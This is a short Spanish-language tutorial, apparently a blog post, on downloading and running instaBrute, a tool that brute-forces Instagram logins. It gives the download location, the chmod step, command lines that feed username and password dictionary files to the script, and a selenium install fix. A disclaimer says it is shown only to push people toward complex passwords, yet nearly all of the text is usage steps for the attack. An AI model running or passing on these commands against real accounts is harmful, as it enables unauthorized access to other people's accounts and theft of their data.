Atención: No me hago responsable del mal uso. Sólo lo pongo como información y para que veáis que hay que poner contraseñas complejas. ¡¡¡ NO LO HAGÁIS, POR FAVOR !!!

Descargamos instabrute de https://github.com/chinoogawa/instaBrute



Descomprimimos y nos vamos al directorio



Cambiamos los permisos para poder ejecutarlo

chmod +x instaBrute.py



El modo de usarlo es

python instaBrute.py -f diccionario_usuarios -d diccionario_contraseñas

o

python instabrute.py -u usuario -d diccionario_contraseñas

Si nos sale un error sobre selenium, hay que instalarlo

pip install -U selenium (sólo si selenium no está instalado)